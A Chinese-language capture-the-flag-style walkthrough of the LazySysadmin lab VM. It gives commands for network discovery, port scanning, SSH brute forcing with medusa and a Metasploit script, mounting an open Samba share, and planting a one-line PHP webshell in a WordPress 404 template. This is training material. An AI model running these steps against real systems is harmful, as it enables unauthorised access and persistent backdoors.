kali渗透综合靶机之Lazysysadmin

0x01靶机环境下载

Lazysysadmin靶机百度云下载
链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ
提取码:q6zo

0x02 Lazysysadmin靶机搭建

直接在VMware打开即可

文件->打开->Lazysysadmin.ovf

kali渗透综合靶机之Lazysysadmin插图

0x03 渗透测试

主机发现

netdiscover -i eth0 -r 192.168.20.0/24 

或 netdiscover -i eth0 -r 192.168.106.0/24,速度慢,二层扫描

kali渗透综合靶机之Lazysysadmin插图(1)

kali渗透综合靶机之Lazysysadmin插图(2)

端口扫描

masscan是扫描端口速度是很快的

nmap -sV 192.168.20.134

或masscan 192.168.20.134 -p 0-65535 --rate=10000

kali渗透综合靶机之Lazysysadmin插图(3)

kali渗透综合靶机之Lazysysadmin插图(4)

他开启了ssh端口,我们可以进行爆破

我们这里使用美杜莎

medusa -M ssh -h IP -U 用户文件 -P 密码文件

medusa -M ssh -h 192.168.20.134 -U user.txt -P pass.txt

kali渗透综合靶机之Lazysysadmin插图(5)

或使用msf爆破ssh模块

把以下内容保存为ssh_login.rc文件

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.20.134
set USER_FILE /root/user.txt
set PASS_FILE /root/pass.txt
set THREADS 5
exploit
搜索ssh登录模块
search ssh_login
用ssh爆破模块
use auxiliary/scanner/ssh/ssh_login
设置目标IP
set RHOSTS 192.168.20.134
设置爆破登录用户
set USER_FILE /root/user.txt
设置爆破登录密码
set PASS_FILE /root/pass.txt
设置爆破线程
set THREADS 5
查看是否修改完成
show options
运行模块
exploit

kali渗透综合靶机之Lazysysadmin插图(6)

使用msfconsole -r ssh_login.rc

kali渗透综合靶机之Lazysysadmin插图(7)

我们知道了ssh账号密码后,果断用ssh连接,成功登陆,查看用户所属组,此用户属于sudo组,具有管理员权限
ssh -l togie 192.168.106.140 指定togie用户登录ssh

kali渗透综合靶机之Lazysysadmin插图(8)

groups 查看所属组,发先有sudo组,那我们就sudo su root提升为管理员权限,密码是togie的密码12345

kali渗透综合靶机之Lazysysadmin插图(9)

这个目标拿下,接着我们转向下一个目标

目标开放了80端口,我们看看

kali渗透综合靶机之Lazysysadmin插图(10)

通过dirbuster扫描我们可以看到一些可疑目录

kali渗透综合靶机之Lazysysadmin插图(11)

info.php、phpmyadmin、wordpress

Info.php泄露了一些敏感信息

kali渗透综合靶机之Lazysysadmin插图(12)

phpmyadmin可以尝试爆破

kali渗透综合靶机之Lazysysadmin插图(13)

wordpress有个默认后台页面可以尝试爆破,无果

kali渗透综合靶机之Lazysysadmin插图(14)

kali渗透综合靶机之Lazysysadmin插图(15)

换路线

尝试从samba服务发现漏洞

使用enum4linux枚举运行samba的主机信息
enum4linux 192.168.20.134

发现存在共享目录,允许空口令

kali渗透综合靶机之Lazysysadmin插图(16)

可以远程挂载,查看共享目录,发现共享的是网站的根目录

mount -t cifs -o username=’’,password=’’ //192.168.20.134/share$ /mnt

kali渗透综合靶机之Lazysysadmin插图(17)

接着就是找敏感信息了,发现数据库账号密码,登录上去试试

kali渗透综合靶机之Lazysysadmin插图(18)

发现导出一句话路径被限制并且wordpress数据库没有访问权限

kali渗透综合靶机之Lazysysadmin插图(19)

kali渗透综合靶机之Lazysysadmin插图(20)

试想了一下,数据库和后台是不是同用的

kali渗透综合靶机之Lazysysadmin插图(21)

成功

kali渗透综合靶机之Lazysysadmin插图(22)

然后就是getshell了

可以在一个404页面中添加一句话木马留后门,上传这个404页面

kali渗透综合靶机之Lazysysadmin插图(23)

kali渗透综合靶机之Lazysysadmin插图(24)
完成,接下来我们看看还有没有其他利用点能成功的

接着我们看向了6667端口

6667端口之unreal_ircd_3281_backdoor

但是无果

kali渗透综合靶机之Lazysysadmin插图(25)

0x04总结

1.信息收集
2.目录爆破
3.ssh爆破
4.wpscan扫描wordpress漏洞
5.文件共享信息泄露
6.进入后台,Appearance页面404.php挂马,菜刀连接,反弹shell

没有账号? 忘记密码?

社交账号快速登录